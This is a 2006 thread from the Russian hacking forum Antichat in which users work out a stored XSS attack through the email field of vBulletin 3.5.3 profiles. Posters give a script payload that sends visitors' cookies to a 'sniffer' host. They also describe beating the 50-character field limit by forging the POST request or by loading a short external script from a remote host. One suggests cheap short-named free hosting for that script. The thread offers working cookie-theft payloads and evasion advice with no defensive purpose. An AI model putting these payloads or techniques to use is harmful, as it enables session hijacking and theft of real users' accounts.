Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   vBulletin 3.5.3. Вопрос по XSS в поле email (https://forum.antichat.xyz/showthread.php?t=23678)

r0 08.09.2006 16:42

vBulletin 3.5.3. Вопрос по XSS в поле email
 
В этой версии форума в поле mail в профиле, можно провести xss

Цитата:

mail@mail.com”><script>img = new Image(); img.src = "http://сниффер/картинка.jpg?"+document.cookie;</script>.nomatt
Вот, но поле для ввода ограничено 50ти символами, эм.. возникает вопрос: как быть тогда? +)

D=P=CH= MOD= 08.09.2006 17:05

Наверное тогда никак - скрипт если тока уменьшить, но кажись это не реал...
Для того и есть эти ограничения)

r0 08.09.2006 17:12

В том то и дело) как тестилось-то? на локалхосте? :) зачем тогда xss? просто, чтобы признать ее существование?

wsr 08.09.2006 19:04

Все гораздо проще, формируете ПОСТ запрос и туда подставляете все что нужно вместо поля e-mail. Все ограничения сразу же отпадают. У меня все работает без проблем.

Azazel 09.09.2006 12:54

yaa@mail.ru”<script>src=http://aa.bab.ru/x.js?<b> Хехе 49 символов. Если удасться такой короткий url найти для сайта.))) А в x.js img = new Image(); img.src = "http://сниффер/картинка.jpg?"+document.cookie;

Может сработает, а может и нет. ))

r0 09.09.2006 16:00

спасибо за идею)

genom-- 09.09.2006 18:41

под такой пример подойдет фришный хост на холме у них там h10.ru и h7.ru вместо лонига 2-3 символа


Время: 15:17